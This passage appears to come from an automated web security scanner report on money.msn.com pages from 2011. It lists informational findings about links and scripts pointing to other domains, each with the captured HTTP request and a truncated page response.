searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 5854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.66. http://money.msn.com/market-news/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
ntCoent-Length: 81429
Content-Length: 81429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><link rel="stylesheet" type="text/css" href="http://cpc.db3.s-msn.com/MSN/sc/css/6a/3f779e02d09e82eb1eda5cc0043c14.css" media="all" /><!--[if IE]>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomemsn.com">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303842954&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.msn.com%2Fmarket-news%2Fdefault.aspx%3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<img alt="Gold .. Comstock Images/Jupiterimages" class="imagefloatleft userImage lead" src="http://moneycentral.msn.com/content/data/images-v2/164/Gold_Coins_Ingots_Newspaper_164_001CA310.jpg" /><a href="http://www.thestreet.com?cm_ven=msnp" title="http://www.thestreet.com?cm_ven=msnp"><img alt="thestreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426163117_thestreet.gif" /></a>By Alix Steel, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Silver and gold prices fell from recent highs Tuesday as the market turned its focus to the start of a two-day <a href="http://www.bing.com/news/search?q=federal+reserve+meeting&amp;form=msmony" title="http://www.bing.com/news/search?q=federal+reserve+meeting&amp;form=msmony">Federal Reserve meeting</a>
...[SNIP]...
<div class="pst_bod more"><img alt="Charley Blaine" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426144636_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" /><b>
...[SNIP]...
d revenue as a result, and the stock dropped 2.5% in morning trading to $66.06. &quot;The high exposure to Japan remains a major uncertainty,&quot; one Credit Suisse analyst wrote in a note this week, <a href="http://www.businessweek.com/news/2011-04-26/coca-cola-profit-misses-analyst-estimates-on-japan-disaster.html" title="http://www.businessweek.com/news/2011-04-26/coca-cola-profit-misses-analyst-estimates-on-japan-disaster.html">according to Bloomberg</a>
...[SNIP]...
<p><img alt="Image: Wall Street sign (.. Comstock Images/age fotostock)" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121415_stockphotoforMSN.jpg" /><a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp"><img alt="TheStreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121727_thestreet.gif" /></a>By Melinda Peer, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p><a href="http://www.thestreet.com?cm_ven=msnp" title="http://www.thestreet.com?cm_ven=msnp"><img alt="the street" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110425183752_thestreet.gif" /></a><img alt="Gold .. Comstock Images/Jupiterimages" class="imagefloatleft userImage lead" src="http://moneycentral.msn.com/content/data/images-v2/164/Gold_Coins_Ingots_Newspaper_164_001CA310.jpg" />By Alix Steel, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Gold and <a href="http://www.bing.com/news/search?q=silver+prices&amp;form=msmony" title="http://www.bing.com/news/search?q=silver+prices&amp;form=msmony">silver prices</a> notched modest gains as a recovering <a href="http://www.bing.com/news/search?q=us+dollar&amp;form=msmony" title="http://www.bing.com/news/search?q=us+dollar&amp;form=msmony">U.S. dollar</a>
...[SNIP]...
<p>Silver prices roared out of the gate Monday, <a href="http://www.thestreet.com/story/11090806/1/why-silver-prices-wont-quit.html?cm_ven=msnp" title="http://www.thestreet.com/story/11090806/1/why-silver-prices-wont-quit.html?cm_ven=msnp">nearly conquering their record high of $50 an ounce</a>
...[SNIP]...
<div class="pst_bod more"><img alt="Charley Blaine" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110425152333_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" /><b>
...[SNIP]...
<p><img alt="Image: Wall Street sign (.. Comstock Images/age fotostock)" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121415_stockphotoforMSN.jpg" /><a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp"><img alt="TheStreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121727_thestreet.gif" /></a>By Melinda Peer, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. StockScouter data provided by <a class="opennew" href="http://www.gradientanalytics.com/">Gradient Analytics</a>. IPO data provided by <a class="opennew" href="http://www.hoovers.com">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2608-Leadership-Management-Most-employees-are-not-loyal?ocid=xnetr2-3">Study shows most employees are not loyal</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ron+paul&amp;form=MSNXNM&amp;ocid=xnetr2-4">Bing: Ron Paul joins 2012 White House race</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+much+to+budget+for+home+maintenance&amp;form=MONEY3" class="opennew">Budgeting for home maintenance</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+live+cash-only&amp;form=MONEY3" class="opennew">Could you live on cash alone?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=jobs+and+hiring+fields+2011&amp;form=MONEY3" class="opennew">Career fields that are hiring now</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3" class="opennew">How much do I need to retire at 50?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3" class="opennew">What's the secret of saving money?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=best+values+in+public+colleges+2011&amp;form=MONEY3" class="opennew">Best values in public colleges</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

19.67. http://money.msn.com/market-news/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:48 GMT
ntCoent-Length: 81429
Content-Length: 81429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><link rel="stylesheet" type="text/css" href="http://cpc.db3.s-msn.com/MSN/sc/css/6a/3f779e02d09e82eb1eda5cc0043c14.css" media="all" /><!--[if IE]>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomemsn.com">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303843009&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.msn.com%2Fmarket-news%2Fdefault.aspx%3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<img alt="Gold .. Comstock Images/Jupiterimages" class="imagefloatleft userImage lead" src="http://moneycentral.msn.com/content/data/images-v2/164/Gold_Coins_Ingots_Newspaper_164_001CA310.jpg" /><a href="http://www.thestreet.com?cm_ven=msnp" title="http://www.thestreet.com?cm_ven=msnp"><img alt="thestreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426163117_thestreet.gif" /></a>By Alix Steel, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Silver and gold prices fell from recent highs Tuesday as the market turned its focus to the start of a two-day <a href="http://www.bing.com/news/search?q=federal+reserve+meeting&amp;form=msmony" title="http://www.bing.com/news/search?q=federal+reserve+meeting&amp;form=msmony">Federal Reserve meeting</a>
...[SNIP]...
<div class="pst_bod more"><img alt="Charley Blaine" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426144636_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" /><b>
...[SNIP]...
d revenue as a result, and the stock dropped 2.5% in morning trading to $66.06. &quot;The high exposure to Japan remains a major uncertainty,&quot; one Credit Suisse analyst wrote in a note this week, <a href="http://www.businessweek.com/news/2011-04-26/coca-cola-profit-misses-analyst-estimates-on-japan-disaster.html" title="http://www.businessweek.com/news/2011-04-26/coca-cola-profit-misses-analyst-estimates-on-japan-disaster.html">according to Bloomberg</a>
...[SNIP]...
<p><img alt="Image: Wall Street sign (.. Comstock Images/age fotostock)" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121415_stockphotoforMSN.jpg" /><a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp"><img alt="TheStreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121727_thestreet.gif" /></a>By Melinda Peer, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p><a href="http://www.thestreet.com?cm_ven=msnp" title="http://www.thestreet.com?cm_ven=msnp"><img alt="the street" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110425183752_thestreet.gif" /></a><img alt="Gold .. Comstock Images/Jupiterimages" class="imagefloatleft userImage lead" src="http://moneycentral.msn.com/content/data/images-v2/164/Gold_Coins_Ingots_Newspaper_164_001CA310.jpg" />By Alix Steel, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Gold and <a href="http://www.bing.com/news/search?q=silver+prices&amp;form=msmony" title="http://www.bing.com/news/search?q=silver+prices&amp;form=msmony">silver prices</a> notched modest gains as a recovering <a href="http://www.bing.com/news/search?q=us+dollar&amp;form=msmony" title="http://www.bing.com/news/search?q=us+dollar&amp;form=msmony">U.S. dollar</a>
...[SNIP]...
<p>Silver prices roared out of the gate Monday, <a href="http://www.thestreet.com/story/11090806/1/why-silver-prices-wont-quit.html?cm_ven=msnp" title="http://www.thestreet.com/story/11090806/1/why-silver-prices-wont-quit.html?cm_ven=msnp">nearly conquering their record high of $50 an ounce</a>
...[SNIP]...
<div class="pst_bod more"><img alt="Charley Blaine" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110425152333_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" /><b>
...[SNIP]...
<p><img alt="Image: Wall Street sign (.. Comstock Images/age fotostock)" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121415_stockphotoforMSN.jpg" /><a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp"><img alt="TheStreet" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110203121727_thestreet.gif" /></a>By Melinda Peer, <a href="http://www.thestreet.com/?cm_ven=msnp" title="http://www.thestreet.com/?cm_ven=msnp">TheStreet</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. StockScouter data provided by <a class="opennew" href="http://www.gradientanalytics.com/">Gradient Analytics</a>. IPO data provided by <a class="opennew" href="http://www.hoovers.com">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2608-Leadership-Management-Most-employees-are-not-loyal?ocid=xnetr2-3">Study shows most employees are not loyal</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ron+paul&amp;form=MSNXNM&amp;ocid=xnetr2-4">Bing: Ron Paul joins 2012 White House race</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+much+to+budget+for+home+maintenance&amp;form=MONEY3" class="opennew">Budgeting for home maintenance</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+live+cash-only&amp;form=MONEY3" class="opennew">Could you live on cash alone?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=jobs+and+hiring+fields+2011&amp;form=MONEY3" class="opennew">Career fields that are hiring now</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3" class="opennew">How much do I need to retire at 50?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3" class="opennew">What's the secret of saving money?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=best+values+in+public+colleges+2011&amp;form=MONEY3" class="opennew">Best values in public colleges</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

19.68. http://money.msn.com/market-news/post.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:47 GMT
ntCoent-Length: 78339
Content-Length: 78339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><link rel="stylesheet" type="text/css" href="http://cpc.db3.s-msn.com/MSN/sc/css/6a/3f779e02d09e82eb1eda5cc0043c14.css" media="all" /><!--[if IE]>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomemsn.com">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303843008&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.msn.com%2Fmarket-news%2Fpost.aspx%3Fpost%3D52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426144636_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
<div class="embed-box"><object id="CustomPlayer1_IE" type="application/x-shockwave-flash" width="610" height="500" data="http://img.widgets.video.s-msn.com/fl/customplayer/current/customplayer.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/fl/customplayer/current/customplayer.swf" />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
